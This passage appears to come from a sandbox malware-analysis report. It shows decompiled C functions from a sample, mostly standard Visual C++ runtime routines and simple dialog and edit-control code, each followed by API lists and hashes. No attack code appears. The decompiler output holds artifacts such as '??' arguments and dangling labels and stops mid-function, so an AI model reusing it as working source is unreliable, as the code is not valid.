                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: __aulldiv
                                                      • String ID: :$f$f$f$p$p$p
                                                      • API String ID: 3732870572-1434680307
                                                      • Opcode ID: ef6bc2e063b70a0b697afbc1963290eb505d01a5fd187044d4f724639cf4a4df
                                                      • Instruction ID: 4250cb3ae088cc197ff16e131f620fbe807ad4cc22e0c21334b4a8f2f3e02e6c
                                                      • Opcode Fuzzy Hash: ef6bc2e063b70a0b697afbc1963290eb505d01a5fd187044d4f724639cf4a4df
                                                      • Instruction Fuzzy Hash: B0029DBDA00119DADF208FA7D5446EDB7B2FF82B14FA44117D8556B280D7389EC48B1E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042A3FD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0042A3FD(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x44cd90 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x443718 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x44cd90 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x44cd90 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00428702(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00428702(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                                                      0x0042a406
                                                      0x0042a49b
                                                      0x0042a40e
                                                      0x0042a410
                                                      0x0042a41a
                                                      0x0042a41f
                                                      0x0042a42c
                                                      0x0042a441
                                                      0x0042a445
                                                      0x0042a4ab
                                                      0x0042a4b0
                                                      0x0042a4b7
                                                      0x0042a4bb
                                                      0x0042a4be
                                                      0x0042a4be
                                                      0x0042a4c4
                                                      0x0042a4c4
                                                      0x0042a4a6
                                                      0x0042a4aa
                                                      0x0042a4aa
                                                      0x0042a447
                                                      0x0042a450
                                                      0x0042a489
                                                      0x0042a496
                                                      0x0042a498
                                                      0x0042a498
                                                      0x00000000
                                                      0x0042a498
                                                      0x0042a45a
                                                      0x0042a45f
                                                      0x0042a464
                                                      0x00000000
                                                      0x00000000
                                                      0x0042a46e
                                                      0x0042a473
                                                      0x0042a478
                                                      0x00000000
                                                      0x00000000
                                                      0x0042a47d
                                                      0x0042a483
                                                      0x0042a487
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042a487
                                                      0x0042a424
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0042a42a
                                                      0x0042a4a4
                                                      0x00000000

                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,0042A50A,?,?,00000000,00000000,00000001,?,0042A8D1,00000021,FlsSetValue,00443FD8,FlsSetValue,00000000), ref: 0042A4BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3664257935-537541572
                                                      • Opcode ID: c5fc15a0cab97120ea7dec4c222a507ec7c49cbfb5a641e542bbf63bc817fd81
                                                      • Instruction ID: c495887507ddd5099ba1b9cb16eed3f84042880c6aab386f23ec267f0fae7beb
                                                      • Opcode Fuzzy Hash: c5fc15a0cab97120ea7dec4c222a507ec7c49cbfb5a641e542bbf63bc817fd81
                                                      • Instruction Fuzzy Hash: C1212E7AB01130ABC721EF20FC89A5B77689B46760F650122ED05A7391D678ED21C6EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0043637F Relevance: 9.2, APIs: 6, Instructions: 248COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 81%
                                                      			E0043637F(void* __ebx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v56;
				signed int _t49;
				signed int _t61;
				signed int _t62;
				void* _t65;
				signed int _t66;
				signed int _t67;
				char* _t77;
				char* _t78;
				intOrPtr _t82;
				int _t84;
				intOrPtr* _t85;
				void* _t86;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr* _t111;
				void* _t112;
				intOrPtr* _t113;
				intOrPtr _t115;
				intOrPtr* _t118;
				signed int _t119;
				void* _t120;
				intOrPtr* _t122;
				void* _t123;
				intOrPtr* _t124;

				_t49 =  *0x44b018; // 0x1989d38f
				_v8 = _t49 ^ _t119;
				_t87 = _a24;
				_v40 = _a4;
				_t115 = _a20;
				_v44 = _a8;
				_t53 = _a16;
				_v32 = _a16;
				_v36 = _a24;
				if(_t115 <= 0) {
					if(_t115 < 0xffffffff) {
						goto L54;
					} else {
						goto L3;
					}
				} else {
					_t82 = E004362FE(_t53, _t115);
					_t87 = _v36;
					_t115 = _t82;
					L3:
					_t109 = _a28;
					if(_t109 <= 0) {
						if(_t109 < 0xffffffff) {
							goto L54;
						} else {
							goto L6;
						}
					} else {
						_t109 = E004362FE(_t87, _t109);
						_a28 = _t109;
						L6:
						_t84 = _a32;
						if(_t84 == 0) {
							_t84 =  *( *_v40 + 8);
							_a32 = _t84;
						}
						if(_t115 == 0 || _t109 == 0) {
							if(_t115 == _t109) {
								L61:
								_push(2);
								goto L23;
							} else {
								if(_t109 > 1) {
									L32:
								} else {
									if(_t115 > 1) {
										L22:
										_push(3);
										goto L23;
									} else {
										if(GetCPInfo(_t84,  &_v28) == 0) {
											goto L54;
										} else {
											if(_t115 <= 0) {
												if(_t109 <= 0) {
													goto L33;
												} else {
													if(_v28 >= 2) {
														_t77 =  &_v22;
														if(_v22 != 0) {
															_t113 = _v36;
															while(1) {
																_t98 =  *((intOrPtr*)(_t77 + 1));
																if(_t98 == 0) {
																	goto L32;
																}
																_t106 =  *_t113;
																if(_t106 <  *_t77 || _t106 > _t98) {
																	_t77 = _t77 + 2;
																	if( *_t77 != 0) {
																		continue;
																	} else {
																		goto L32;
																	}
																} else {
																	goto L61;
																}
																goto L55;
															}
														}
													}
													goto L32;
												}
											} else {
												if(_v28 >= 2) {
													_t78 =  &_v22;
													if(_v22 != 0) {
														_t118 = _v32;
														while(1) {
															_t99 =  *((intOrPtr*)(_t78 + 1));
															if(_t99 == 0) {
																goto L22;
															}
															_t107 =  *_t118;
															if(_t107 <  *_t78 || _t107 > _t99) {
																_t78 = _t78 + 2;
																if( *_t78 != 0) {
																	continue;
																} else {
																	goto L22;
																}
															} else {
																goto L61;
															}
															goto L23;
														}
													}
												}
												goto L22;
												L23:
											}
										}
									}
								}
							}
						} else {
							L33:
							_t61 = E0042555F(_t84, 9, _v32, _t115, 0, 0);
							_t122 = _t120 + 0x18;
							_v40 = _t61;
							if(_t61 == 0) {
								L54:
							} else {
								asm("sbb eax, eax");
								_t62 = _t61 & _t61 + _t61 + 0x00000008;
								if(_t62 == 0) {
									L60:
									_push(0);
									goto L59;
								} else {
									if(_t62 > 0x400) {
										_t85 = E00410766(_t62);
										if(_t85 == 0) {
											goto L60;
										} else {
											 *_t85 = 0xdddd;
											goto L40;
										}
									} else {
										E0043A3F0();
										_t85 = _t122;
										if(_t85 == 0) {
											goto L60;
										} else {
											 *_t85 = 0xcccc;
											L40:
											_t86 = _t85 + 8;
											if(_t86 == 0) {
												goto L60;
											} else {
												_t116 = _a32;
												_t65 = E0042555F(_a32, 1, _v32, _t115, _t86, _v40);
												_t123 = _t122 + 0x18;
												if(_t65 == 0) {
													L58:
													_push(_t86);
													L59:
													E004288C5();
													goto L53;
												} else {
													_t66 = E0042555F(_t116, 9, _v36, _t109, 0, 0);
													_t124 = _t123 + 0x18;
													_v32 = _t66;
													if(_t66 == 0) {
														goto L58;
													} else {
														asm("sbb eax, eax");
														_t67 = _t66 & _t66 + _t66 + 0x00000008;
														if(_t67 == 0) {
															L57:
															_push(0);
															goto L52;
														} else {
															if(_t67 > 0x400) {
																_t111 = E00410766(_t67);
																if(_t111 == 0) {
																	goto L57;
																} else {
																	 *_t111 = 0xdddd;
																	goto L49;
																}
															} else {
																E0043A3F0();
																_t111 = _t124;
																if(_t111 == 0) {
																	goto L57;
																} else {
																	 *_t111 = 0xcccc;
																	L49:
																	_t112 = _t111 + 8;
																	if(_t112 == 0) {
																		goto L57;
																	} else {
																		if(E0042555F(_t116, 1, _v36, _a28, _t112, _v32) != 0) {
																			E0042A747(_v44, _a12, _t86, _v40, _t112, _v32, 0, 0, 0);
																			E004288C5(_t112);
																			E004288C5(_t86);
																		} else {
																			_push(_t112);
																			L52:
																			E004288C5();
																			E004288C5(_t86);
																			L53:
																			goto L54;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L55:
				return E0040361D(_v8 ^ _t119);
			}






































                                                      0x00436387
                                                      0x0043638e
                                                      0x00436394
                                                      0x00436398
                                                      0x0043639f
                                                      0x004363a2
                                                      0x004363a5
                                                      0x004363a8
                                                      0x004363ab
                                                      0x004363b1
                                                      0x004363c6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004363b3
                                                      0x004363b5
                                                      0x004363bc
                                                      0x004363bf
                                                      0x004363cc
                                                      0x004363cc
                                                      0x004363d1
                                                      0x004363e6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004363d3
                                                      0x004363db
                                                      0x004363de
                                                      0x004363ec
                                                      0x004363ec
                                                      0x004363f1
                                                      0x004363f8
                                                      0x004363fb
                                                      0x004363fb
                                                      0x00436400
                                                      0x0043640c
                                                      0x00436617
                                                      0x00436617
                                                      0x00000000
                                                      0x00436412
                                                      0x00436415
                                                      0x004364a1
                                                      0x0043641b
                                                      0x0043641e
                                                      0x00436466
                                                      0x00436466
                                                      0x00000000
                                                      0x00436420
                                                      0x0043642d
                                                      0x00000000
                                                      0x00436433
                                                      0x00436435
                                                      0x00436470
                                                      0x00000000
                                                      0x00436472
                                                      0x00436476
                                                      0x0043647c
                                                      0x0043647f
                                                      0x00436481
                                                      0x00436484
                                                      0x00436484
                                                      0x00436489
                                                      0x00000000
                                                      0x00000000
                                                      0x0043648b
                                                      0x0043648f
                                                      0x00436499
                                                      0x0043649f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0043648f
                                                      0x00436484
                                                      0x0043647f
                                                      0x00000000
                                                      0x00436476
                                                      0x00436437
                                                      0x0043643b
                                                      0x00436441
                                                      0x00436444
                                                      0x00436446
                                                      0x00436449
                                                      0x00436449
                                                      0x0043644e
                                                      0x00000000
                                                      0x00000000
                                                      0x00436450
                                                      0x00436454
                                                      0x0043645e
                                                      0x00436464
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00436454
                                                      0x00436449
                                                      0x00436444
                                                      0x00000000
                                                      0x00436468
                                                      0x00436468
                                                      0x00436435
                                                      0x0043642d
                                                      0x0043641e
                                                      0x00436415
                                                      0x004364a9
                                                      0x004364a9
                                                      0x004364b4
                                                      0x004364b9
                                                      0x004364bc
                                                      0x004364c1
                                                      0x004365c7
                                                      0x004364c7
                                                      0x004364cf
                                                      0x004364d1
                                                      0x004364d3
                                                      0x00436613
                                                      0x00436613
                                                      0x00000000
                                                      0x004364d9
                                                      0x004364de
                                                      0x004364fd
                                                      0x00436502
                                                      0x00000000
                                                      0x00436508
                                                      0x00436508
                                                      0x00000000
                                                      0x00436508
                                                      0x004364e0
                                                      0x004364e0
                                                      0x004364e5
                                                      0x004364e9
                                                      0x00000000
                                                      0x004364ef
                                                      0x004364ef
                                                      0x0043650e
                                                      0x0043650e
                                                      0x00436513
                                                      0x00000000
                                                      0x00436519
                                                      0x00436521
                                                      0x00436527
                                                      0x0043652c
                                                      0x00436531
                                                      0x0043660b
                                                      0x0043660b
                                                      0x0043660c
                                                      0x0043660c
                                                      0x00000000
                                                      0x00436537
                                                      0x00436543
                                                      0x00436548
                                                      0x0043654b
                                                      0x00436550
                                                      0x00000000
                                                      0x00436556
                                                      0x0043655e
                                                      0x00436560
                                                      0x00436562
                                                      0x00436607
                                                      0x00436607
                                                      0x00000000
                                                      0x00436568
                                                      0x0043656d
                                                      0x0043658c
                                                      0x00436591
                                                      0x00000000
                                                      0x00436593
                                                      0x00436593
                                                      0x00000000
                                                      0x00436593
                                                      0x0043656f
                                                      0x0043656f
                                                      0x00436574
                                                      0x00436578
                                                      0x00000000
                                                      0x0043657e
                                                      0x0043657e
                                                      0x00436599
                                                      0x00436599
                                                      0x0043659e
                                                      0x00000000
                                                      0x004365a0
                                                      0x004365b7
                                                      0x004365ee
                                                      0x004365f6
                                                      0x004365fc
                                                      0x004365b9
                                                      0x004365b9
                                                      0x004365ba
                                                      0x004365ba
                                                      0x004365c0
                                                      0x004365c6
                                                      0x00000000
                                                      0x004365c6
                                                      0x004365b7
                                                      0x0043659e
                                                      0x00436578
                                                      0x0043656d
                                                      0x00436562
                                                      0x00436550
                                                      0x00436531
                                                      0x00436513
                                                      0x004364e9
                                                      0x004364de
                                                      0x004364d3
                                                      0x004364c1
                                                      0x00436400
                                                      0x004363d1
                                                      0x004365c9
                                                      0x004365da

                                                      APIs
                                                      • GetCPInfo.KERNEL32(00691B48,00691B48,?,7FFFFFFF,?,0043664F,00691B48,00691B48,?,00691B48,?,?,?,?,00691B48,?), ref: 00436425
                                                      • __freea.LIBCMT ref: 004365BA
                                                      • __freea.LIBCMT ref: 004365C0
                                                      • __freea.LIBCMT ref: 004365F6
                                                      • __freea.LIBCMT ref: 004365FC
                                                      • __freea.LIBCMT ref: 0043660C
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: __freea$Info
                                                      • String ID:
                                                      • API String ID: 541289543-0
                                                      • Opcode ID: e6968597c6359ecdffc9c25be2ab6ba7af36522f211eb4fb76767b5cfe3cf14f
                                                      • Instruction ID: f0084c9f04dfe312fb480d8817387531af07212ab4001156bd640ad54b14c503
                                                      • Opcode Fuzzy Hash: e6968597c6359ecdffc9c25be2ab6ba7af36522f211eb4fb76767b5cfe3cf14f
                                                      • Instruction Fuzzy Hash: DC71E372A00206BBDF209B549C42BAF7BA99F4D314F26906BE904A7281D63DDD448B6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404060 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404060(void* __ecx) {
				void* _t4;
				void* _t11;
				long _t25;
				void* _t28;

				if( *0x44b020 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E0040461D(__eflags,  *0x44b020);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00404657(__eflags,  *0x44b020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E004108CD(1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00404657(__eflags,  *0x44b020, 0);
								} else {
									__eflags = E00404657(__eflags,  *0x44b020, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E0041072C(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}







                                                      0x00404067
                                                      0x0040407a
                                                      0x00404081
                                                      0x00404084
                                                      0x00404087
                                                      0x004040a0
                                                      0x004040a0
                                                      0x00404089
                                                      0x00404089
                                                      0x0040408b
                                                      0x00404095
                                                      0x0040409c
                                                      0x0040409e
                                                      0x004040ae
                                                      0x004040b2
                                                      0x004040b4
                                                      0x004040c8
                                                      0x004040c8
                                                      0x004040d1
                                                      0x004040b6
                                                      0x004040c4
                                                      0x004040c6
                                                      0x004040da
                                                      0x004040dc
                                                      0x004040dc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004040c6
                                                      0x004040df
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040409e
                                                      0x0040408b
                                                      0x004040e7
                                                      0x004040f1
                                                      0x00404069
                                                      0x0040406b
                                                      0x0040406b

                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00404057,0043BADB,00448A50,00000010,0043AF2B,?,?,?,?,?,00000000,?), ref: 0040406E
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040407C
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00404095
                                                      • SetLastError.KERNEL32(00000000,00404057,0043BADB,00448A50,00000010,0043AF2B,?,?,?,?,?,00000000,?), ref: 004040E7
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: a9e9ea3cb9a0922dae9a8cd73f523814c2df150902ef322e7f9fa40bfe1846b1
                                                      • Instruction ID: 2dacca0b92dd3963113c1c3b7fd9c75c4c3ec850a0e77d5f80cd3188d3d61504
                                                      • Opcode Fuzzy Hash: a9e9ea3cb9a0922dae9a8cd73f523814c2df150902ef322e7f9fa40bfe1846b1
                                                      • Instruction Fuzzy Hash: 9701D2B66093155AE6242BB66C856672694DB9637AB20023BF334711F0FF7E4C14518C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040240F Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E0040240F(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t7;
				void* _t14;

				_t7 = _a8 - 0x110;
				if(_t7 == 0) {
					SetDlgItemInt(_a4, 0x194, SendMessageW( *0x44cf0c, 0xc9, 0xffffffff, 0) + 1, 0);
					L8:
					return 0;
				}
				if(_t7 != 1) {
					goto L8;
				}
				_t14 = _a12 - 1;
				if(_t14 == 0) {
					SendMessageW( *0x44cf0c, 0xb1, SendMessageW( *0x44cf0c, 0xbb, GetDlgItemInt(_a4, 0x194, 0, 0) - 1, 0), _t17);
					_push(1);
					L6:
					EndDialog(_a4, ??);
					return 1;
				}
				if(_t14 != 1) {
					goto L8;
				}
				_push(2);
				goto L6;
			}





                                                      0x00402416
                                                      0x0040241b
                                                      0x0040249b
                                                      0x004024a1
                                                      0x00000000
                                                      0x004024a1
                                                      0x00402420
                                                      0x00000000
                                                      0x00000000
                                                      0x00402425
                                                      0x00402428
                                                      0x00402468
                                                      0x0040246a
                                                      0x0040246c
                                                      0x0040246f
                                                      0x00000000
                                                      0x00402477
                                                      0x0040242d
                                                      0x00000000
                                                      0x00000000
                                                      0x0040242f
                                                      0x00000000

                                                      APIs
                                                      • GetDlgItemInt.USER32(?,00000194,00000000,00000000), ref: 0040243F
                                                      • SendMessageW.USER32(000000BB,-00000001,00000000), ref: 00402459
                                                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00402468
                                                      • EndDialog.USER32(?,00000001), ref: 0040246F
                                                      • SendMessageW.USER32(000000C9,000000FF,00000000), ref: 0040248A
                                                      • SetDlgItemInt.USER32(?,00000194,00000001,00000000), ref: 0040249B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Item$Dialog
                                                      • String ID:
                                                      • API String ID: 781181374-0
                                                      • Opcode ID: d9e1b6455d3016b4438351d859a46f1875cd9f7595146534d7716de678b97a0b
                                                      • Instruction ID: f5ae7b7dac5739a0e10782adf3cceccd30725a17cae54bf31fd5568e2a8e52cb
                                                      • Opcode Fuzzy Hash: d9e1b6455d3016b4438351d859a46f1875cd9f7595146534d7716de678b97a0b
                                                      • Instruction Fuzzy Hash: 5E0171352412247FEB201F65DD0DEA73F59EB06B70F004231BE19A51F0C3B98C50DA95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401E6F Relevance: 9.1, APIs: 6, Instructions: 53windowtimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401E6F() {
				struct _SYSTEMTIME _v20;
				void* _v532;

				GetLocalTime( &_v20);
				GetTimeFormatW(0x400, 2,  &_v20, 0,  &_v532, 0xff);
				SendMessageW( *0x44cf0c, 0xc2, 1,  &_v532);
				SendMessageW( *0x44cf0c, 0xc2, 1, " ");
				GetDateFormatW(0x400, 0,  &_v20, 0,  &_v532, 0xff);
				return SendMessageW( *0x44cf0c, 0xc2, 1,  &_v532);
			}





                                                      0x00401e7f
                                                      0x00401e9f
                                                      0x00401ec0
                                                      0x00401ed0
                                                      0x00401ee7
                                                      0x00401f05

                                                      APIs
                                                      • GetLocalTime.KERNEL32(00000000,000000C2,775DBB20,00447ADC), ref: 00401E7F
                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,00000000,00000000,?,000000FF), ref: 00401E9F
                                                      • SendMessageW.USER32(000000C2,00000001,?), ref: 00401EC0
                                                      • SendMessageW.USER32(000000C2,00000001,00447B0C), ref: 00401ED0
                                                      • GetDateFormatW.KERNEL32(00000400,00000000,00000000,00000000,?,000000FF), ref: 00401EE7
                                                      • SendMessageW.USER32(000000C2,00000001,?), ref: 00401EFD
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$FormatTime$DateLocal
                                                      • String ID:
                                                      • API String ID: 3786825601-0
                                                      • Opcode ID: f2682ccc0fb36653fa59daf2144d6dd2143246e3d59cafa4658acd0ea3ab1f06
                                                      • Instruction ID: dc25e6cb7782769b4c61a2e7e208b4cca158996668bc2b03ed7b4c5223bcaf20
                                                      • Opcode Fuzzy Hash: f2682ccc0fb36653fa59daf2144d6dd2143246e3d59cafa4658acd0ea3ab1f06
                                                      • Instruction Fuzzy Hash: B0018875A8021D7BEB20DB91EC89FFB7B3CEB45B00F440476BB04A60D0E3B169498B64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040CD3E Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 61%
                                                      			E0040CD3E(void* __ebx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed short* _v0;
				signed int _v8;
				signed int _v12;
				char _v13;
				void _v512;
				long _v516;
				void* __edi;
				signed int _t17;
				signed int _t27;
				char* _t32;
				signed short* _t35;
				void* _t36;
				void* _t37;
				signed int _t40;
				signed int _t43;

				_t36 = __esi;
				_t40 = _t43;
				if(E0042295C(3) == 1 || __eax == 0 &&  *0x44c038 == 1) {
					_pop(_t40);
					_push(_t40);
					_t41 = _t43;
					_t17 =  *0x44b018; // 0x1989d38f
					_v8 = _t17 ^ _t43;
					_push(_t36);
					_t37 = GetStdHandle(0xfffffff4);
					if(_t37 != 0 && _t37 != 0xffffffff) {
						_t35 = _v0;
						_t32 =  &_v512;
						while(1) {
							 *_t32 =  *_t35;
							_t32 = _t32 + 1;
							if(_t32 ==  &_v12) {
								break;
							}
							_t27 =  *_t35 & 0x0000ffff;
							_t35 =  &(_t35[1]);
							if(_t27 != 0) {
								continue;
							}
							break;
						}
						_v13 = 0;
						_v516 = 0;
						WriteFile(_t37,  &_v512, _t32 -  &_v512 - 1,  &_v516, 0);
					}
					return E0040361D(_v12 ^ _t41);
				} else {
					_push(__esi);
					__eax = E00422A82(0x44c040, 0x314, L"Runtime Error!\n\nProgram: ");
					__ebx = 0;
					if(__eax != 0) {
						L21:
						__eax = E0041F197();
						asm("int3");
						__eax =  *0x44c038; // 0x1
						return __eax;
					} else {
						_push(__edi);
						__esi = 0x44c072;
						 *0x44c27a = __ax;
						__eax = GetModuleFileNameW(0, 0x44c072, 0x104);
						__edi = 0x2fb;
						if(__eax != 0 || E00422A82(0x44c072, 0x2fb, L"<program name unknown>") == 0) {
							_t10 = __esi + 2; // 0x44c074
							__ecx = _t10;
							do {
								__ax =  *__esi;
								__esi = __esi + 2;
							} while (__ax != __bx);
							__esi = __esi - __ecx;
							__esi = __esi >> 1;
							_t11 = __esi + 1; // 0x44c071
							__eax = _t11;
							if(_t11 <= 0x3c) {
								L17:
								_push(L"\n\n");
								__edi = 0x314;
								__esi = 0x44c040;
								_push(0x314);
								if(E00422A13(0x44c040) != 0) {
									goto L21;
								} else {
									_push(_a4);
									__eax = E00422A13(0x44c040);
									__edi = 0x314;
									if(__eax != 0) {
										goto L21;
									} else {
										_push(L"Microsoft Visual C++ Runtime Library");
										__eax = E004231DC(__ecx, 0x314, 0x44c040);
